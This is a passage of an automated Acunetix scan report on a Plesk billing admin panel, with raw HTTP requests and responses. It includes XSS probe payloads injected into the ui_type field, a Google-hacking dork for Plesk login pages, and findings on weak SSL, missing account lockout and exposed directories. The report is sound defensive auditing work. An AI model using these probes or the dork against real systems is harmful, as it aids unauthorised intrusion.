POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 883
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...OCUHtg1VddXbX6b8R0Rk31uxKL4jCZsobUJg5TIU5xriu0ITWbKTWTY8CXZ2J%2bb40jBuvaXdK8no5uOxu6ig1tuUt6u2lortZ5PMuBlZlsVSBTTuo2m36XG1nGdR7XsX204xwfRmrjD3vWXAt11Nz8VoakKmXyhEbmqTWUKM9izMpTvSZ4gsWj%2bczuCBt7u983%2bv8vqlRY3TkEE9XGXNmW4Co2SlyRRUlZ3%2fwNAYhUF-6aa08bb638a3c7ef52dd1951e77f710d12a89d36&request_id=a8x4rz5n8jyth4atjh08g021kdllhffm705&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28929382%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit47
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:12:16 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:12:16 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(958030)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 941
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...bT7otzTtPP6HRHRL27FpPigbdhcpojRgMXR%2fwV9blmeKqXRJVh1ZGTUTTTjs71d3eLnsNza%2b%2b3RdqK0ZowP0bh2qoU0ZuhlaF0g2%2bw0QMR2W5nygCNe6mWo1XT65cIYG0FtPOhyLu8r9FA8fbcSpYxI1KWtSLPdWKKZwY3KQnpYKQPEZPjPLcRy9vZ6bfL%2ffQevjHhyCCKoD%2fwWaPoijJZ8tV5LSHJefwD4p0Go-f16f9880aa4f12de53cf27fea34cfa0a66ab72ab&request_id=rus53u3ath3l8uomn90u5p2yfdllhffmoni&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28958030%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:12:16 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:12:16 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(966728)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 897
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...b8rQtyVarYIOkntd0J11EiM5pHdGhmdoUpOCXumcARyNle8nfsmTpt7vtzv1yPnfAzT9bhdqnVTw1bNo1LTZWBiXsnOXSKGOG63aQ%2fxetZ%2bnXqxDL%2bNn8MTq3U4yNa2r1l6aDbHc9AayBj3kpqle9lTRpjezEJjehSpA9mi6K%2b9BBW8PR77%2bv%2beoROKbRQ98%2bKDzzECW5mSI83Y5IgpyuMPjQn%2bww%3d%3d-af7e49ce9dfa8345b75b5bc5c74a9491d10e7cdb&request_id=i7tm8twu1exhu2r8nhzv053dgdllhfb15hz&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28966728%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit48
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:12:15 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:12:15 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(947895)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 891
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...bvP1E%2bGBeaDmjmEi7PbIiYIgDeQhzDaEdIY9McQ8RVt8H2L2TY3fliXg8vnfsTx296vK1m866PJury63qBqWm8YgVNsm%2bCGL2YdxOUzVhX2u7Ti3Oh%2fPiTr6ThfYNVaZ626BNebX9JrSAZAi%2bSMu4qF1lCNMtJ9QcryR2sJyV%2bL2XIIeP2223%2f%2b9QLSp5Feykw6862JDgKhUNYsuRBo7abn8Agt4SiA%3d%3d-d449d26ccca058f8be3927999fb59010ee52315d&request_id=mxruwqfy9cair3mq4dg5bcvx9dllhfbl23c&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28947895%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:12:15 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:12:15 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(925889)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 905
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...91fCOCNE%2fN2JWfELjt9TqiEGK5DHPNeZ2gioxpVUkWLcDNnZGu1PfTPP1gnaH7TUMoxZeXDsUtVzX3cE5qfV0lp04NWzbBRKFOG6jafu4snVYp0HN%2b1%2bLv4WDqE3osbXtS4b2zasbs9AamIy%2b0Ii0q01lDNMvN2UoHUrqIDFr%2fnMrQQVvj8dm%2f9%2b5OqXFKycvvPrAs40hrkKj5DlKlJTkPf4Ac1gURQ%3d%3d-01b99c8bb5066633b1b1a1ad9d5f1b706e88f586&request_id=yrowwhebzhmk83pzpv9vmfcyzdllhfdokf7&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28925889%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit49
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:12:15 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:12:16 GMT
Server: sw-cp-server
Content-Length: 150
SSL 2.0 deprecated protocol
 
SeverityHigh
TypeConfiguration
Reported by moduleScripting (ssl_ping.script)
Description
The remote service encrypts traffic using an old deprecated protocol with known weaknesses.
Impact
An attacker may be able to exploit these issues to conduct man-in-the-middle attacks or decrypt communications between the affected service and clients.
Recommendation
Disable SSL 2.0 and use SSL 3.0 or TLS 1.0 instead.
Affected items
Server
Details
The SSL server (port: 443) encrypts traffic using an old deprecated protocol (SSL 2.0) with known weaknesses.
SSL weak ciphers
 
SeverityMedium
TypeConfiguration
Reported by moduleScripting (ssl_ping.script)
Description
The remote host supports the use of SSL ciphers that offer either weak encryption or no encryption at all.
Impact
 
Recommendation
Reconfigure the affected application to avoid use of weak ciphers.
Affected items
Acunetix Website Audit50
Server
Details
Weak SSL ciphers (SSL3 on port 443):

SSL3_CK_RSA_RC4_40_MD5 - Low strength
SSL3_CK_RSA_RC2_40_MD5 - Low strength
SSL3_CK_RSA_DES_40_CBC_SHA - Low strength
SSL3_CK_RSA_DES_64_CBC_SHA - Low strength
SSL3_CK_EDH_RSA_DES_40_CBC_SHA - Low strength
SSL3_CK_EDH_RSA_DES_64_CBC_SHA - Low strength
Server
Details
Weak SSL ciphers (TLS1 on port 443):

TLS1_CK_RSA_EXPORT_WITH_RC4_40_MD5 - Low strength
TLS1_CK_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - Low strength
TLS1_CK_RSA_EXPORT_WITH_DES40_CBC_SHA - Low strength
TLS1_CK_RSA_WITH_DES_CBC_SHA - Low strength
TLS1_CK_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA - Low strength
TLS1_CK_DHE_RSA_WITH_DES_CBC_SHA - Low strength
TLS1/SSLv3 Renegotiation Vulnerability
 
SeverityMedium
TypeConfiguration
Reported by moduleTLS1_SSL3_Renegotiation
Description
A vulnerability in the way SSL and TLS protocols allow renegotiation requests may allow an attacker to inject plaintext into an application protocol stream. This could result in a situation where the attacker may be able to issue commands to the server that appear to be coming from a legitimate source. This issue affects SSL version 3.0 and newer and TLS version 1.0 and newer.
Impact
A remote, unauthenticated attacker may be able to inject an arbitrary amount of chosen plaintext into the beginning of the application protocol stream. This could allow and attacker to issue HTTP requests, or take action impersonating the user, among other consequences.
Recommendation
Users should contact vendors for specific patch information.
Affected items
Web Server
Details
No details are available.
Login page password-guessing attack
 
SeverityLow
TypeValidation
Reported by moduleScripting (Html_Authentication_Audit.script)
Description
A common threat web developers face is a password-guessing attack known as a brute force attack. A brute-force attack
Acunetix Website Audit51
is an attempt to discover a password by systematically trying every possible combination of letters, numbers, and symbols until you discover the one correct combination that works.

This login page doesn't have any protection against password-guessing attacks (brute force attacks). It's recommended to implement some type of account lockout after a defined number of incorrect password attempts. Consult Web references for more information about fixing this problem.
Impact
An attacker may attempt to discover a weak password by systematically trying every possible combination of letters, numbers, and symbols until it discovers the one correct combination that works.
Recommendation
It's recommended to implement some type of account lockout after a defined number of incorrect password attempts.
Affected items
/plesk-billing/admin/index.php/default
Details
The scanner tested 10 invalid credentials and no account lockout was detected.
Request
POST /plesk-billing/admin/index.php/default?ctr=login HTTP/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

act=512&user_name=QgpwS7Yk&user_password=dvSaSPNU
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 17:46:37 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-type: text/html
Date: Wed, 28 Sep 2011 17:46:37 GMT
Server: sw-cp-server
Content-Length: 329
Possible sensitive directories
 
SeverityLow
TypeValidation
Reported by moduleScripting (Possible_Sensitive_Directories.script)
Description
A possible sensitive directory has been found. This directory is not directly linked from the website.This check looks for common sensitive resources like backup directories, database dumps, administration pages, temporary directories. Each one of these directories could help an attacker to learn more about his target.
Impact
This directory may expose sensitive information that could help a malicious user to prepare more advanced attacks.
Recommendation
Restrict access to this directory or remove it from the website.
Affected items
Acunetix Website Audit52
/admin
Details
No details are available.
Request
GET /admin HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 301 Moved Permanently
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/admin/
Content-Length: 0
Date: Wed, 28 Sep 2011 14:44:06 GMT
Server: sw-cp-server
/clients
Details
No details are available.
Request
GET /clients HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 301 Moved Permanently
Connection: close
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/clients/
Content-Length: 0
Date: Wed, 28 Sep 2011 14:44:08 GMT
Server: sw-cp-server
/filemanager
Details
No details are available.
Request
GET /filemanager HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 301 Moved Permanently
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/filemanager/
Content-Length: 0
Date: Wed, 28 Sep 2011 14:44:36 GMT
Server: sw-cp-server
Acunetix Website Audit53
/sessions
Details
No details are available.
Request
GET /sessions HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 301 Moved Permanently
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/sessions/
Content-Length: 0
Date: Wed, 28 Sep 2011 14:44:02 GMT
Server: sw-cp-server
Broken links
 
SeverityInformational
TypeInformational
Reported by moduleCrawler
Description
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error. This page was linked from the website but it is inaccessible.
Impact
Problems navigating the site.
Recommendation
Remove the links to this file or make it accessible.
Affected items
/a
Details
No details are available.
Request
GET /a HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Wed, 28 Sep 2011 14:44:00 GMT
Server: sw-cp-server
Acunetix Website Audit54
/clients
Details
No details are available.
Request
GET /clients/ HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 404 Not Found
Expires: Fri, 28 Oct 2011 17:55:37 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Wed, 28 Sep 2011 17:55:37 GMT
Server: sw-cp-server
/filemanager
Details
No details are available.
Request
GET /filemanager/ HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 404 Not Found
Expires: Fri, 28 Oct 2011 17:55:37 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Wed, 28 Sep 2011 17:55:37 GMT
Server: sw-cp-server
/sessions
Details
No details are available.
Request
GET /sessions/ HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 404 Not Found
Expires: Fri, 28 Oct 2011 17:55:37 GMT
Acunetix Website Audit55
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Wed, 28 Sep 2011 17:55:37 GMT
Email address found
 
SeverityInformational
TypeInformational
Reported by moduleScripting (Text_Search.script)
Description
One or more email addresses have been found on this page. The majority of spam comes from email addresses harvested off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scour the internet looking for email addresses on any website they come across. Spambot programs look for strings like myname@mydomain.com and then record any addresses found.
Impact
Email addresses posted on Web sites may attract spam.
Recommendation
Check references for details on how to solve this problem.
Affected items
/plesk-billing/js/ajax/core/ajax.inc.js
Details

Pattern found:
wiley14@gmail.com@st-webdevelopment.de@googlemail.com@st-webdevelopment.de@gmail.com@gmail.com@st-webdevelopment.de@gmail.com@st-webdevelopment.de
Request
GET /plesk-billing/js/ajax/core/ajax.inc.js HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:19 GMT
Cache-Control: max-age=2592000
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 37555
Date: Wed, 28 Sep 2011 14:43:19 GMT
Server: sw-cp-server
/plesk-billing/js/cal/lang/calendar-en.js
Details

Pattern found:
L10n@modernbill.com
Acunetix Website Audit56
Request
GET /plesk-billing/js/cal/lang/calendar-en.js HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Connection: close
Expires: Fri, 28 Oct 2011 14:43:19 GMT
Cache-Control: max-age=2592000
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 4461
Date: Wed, 28 Sep 2011 14:43:19 GMT
Server: sw-cp-server
/plesk-billing/js/cal/src/calendar.js
Details

Pattern found:
support@zapatec.com
Request
GET /plesk-billing/js/cal/src/calendar.js HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:19 GMT
Cache-Control: max-age=2592000
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 94446
Date: Wed, 28 Sep 2011 14:43:19 GMT
Server: sw-cp-server
/plesk-billing/js/main.js
Details

Pattern found:
license@modernbill.com@moderngigabyte.com
Request
GET /plesk-billing/js/main.js HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Acunetix Website Audit57
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:19 GMT
Cache-Control: max-age=2592000
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 46067
Date: Wed, 28 Sep 2011 14:43:19 GMT
Server: sw-cp-server
/plesk-billing/js/scriptaculous/src/dragdrop.js
Details

Pattern found:
sammi@oriontransfer.co.nz
Request
GET /plesk-billing/js/scriptaculous/src/dragdrop.js HTTP/1.1
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/plesk-billing/admin/index.php/default?act=1065&ctr=login
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Connection: Keep-alive
Response
HTTP/1.1 200 OK
Expires: Fri, 28 Oct 2011 14:43:50 GMT
Cache-Control: max-age=2592000
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 30619
Date: Wed, 28 Sep 2011 14:43:50 GMT
Server: sw-cp-server
GHDB: Plesk login page
 
SeverityInformational
TypeInformational
Reported by moduleGHDB
Description

The description for this alert is contributed by the GHDB community, it may contain inappropriate language.

Category : Advisories and Vulnerabilities

Plesk is a multi platform control panel solution for hosting. More information: hxxp://www.swsoft.com/plesk/ Vulnerability: PLESK 7.5 Reload (and lower) & PLESK 7.6 for M$ Windows path passing and disclosure] Discovered By: GuanYu

The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.
Impact
Not available. Check description.
Acunetix Website Audit58
Recommendation
Not available. Check description.
Affected items
/login.php3
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3 HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Last-Modified: Wed, 28 Sep 2011 14:42:25 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login.php3
Content-Length: 0
Date: Wed, 28 Sep 2011 14:42:25 GMT
Server: sw-cp-server
/login.php3 (3374501a911b3c49b06bc10db6add2d8)
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3?requested_url=https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/&window_id= HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Last-Modified: Wed, 28 Sep 2011 14:43:16 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2Fpsa v10.3.1_build1013110726.09 os_RedHat el6%3A8443%2Fsmb%2F
Content-Length: 0
Acunetix Website Audit59
Date: Wed, 28 Sep 2011 14:43:16 GMT
/login.php3 (451975fe1c624b142875d023edec4ef6)
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3?requested_url=https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/admin/fckeditor/&window_id= HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/admin/fckeditor/
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Last-Modified: Wed, 28 Sep 2011 17:55:38 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2Fpsa v10.3.1_build1013110726.09 os_RedHat el6%3A8443%2Fadmin%2Ffckeditor%2F
Content-Length: 0
Date: Wed, 28 Sep 2011 17:55:38 GMT
Server: sw-cp-server
/login.php3 (54ef8f7f96aac35b6e20e7ad66919986)
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3?requested_url=https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/default.asp&window_id= HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/default.asp
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Last-Modified: Wed, 28 Sep 2011 14:43:16 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/login_up.php3?window_id=&requested_url=https%3A%2F%2Fpsa v10.3.1_build1013110726.09 os_RedHat el6%3A8443%2Fsmb%2Fdefault.asp
Content-Length: 0
Date: Wed, 28 Sep 2011 14:43:16 GMT
Acunetix Website Audit60
 
/login.php3 (597ebff7038abda459ad504ef3df20fe)
Details
We found
inurl:+:8443/login.php3
Request
GET /login.php3?requested_url=https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/Default.aspx&window_id= HTTP/1.1
Pragma: no-cache
Referer: https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/smb/default.aspx
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 303 See Other
Last-Modified: Wed, 28 Sep 2011 14:43:16 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
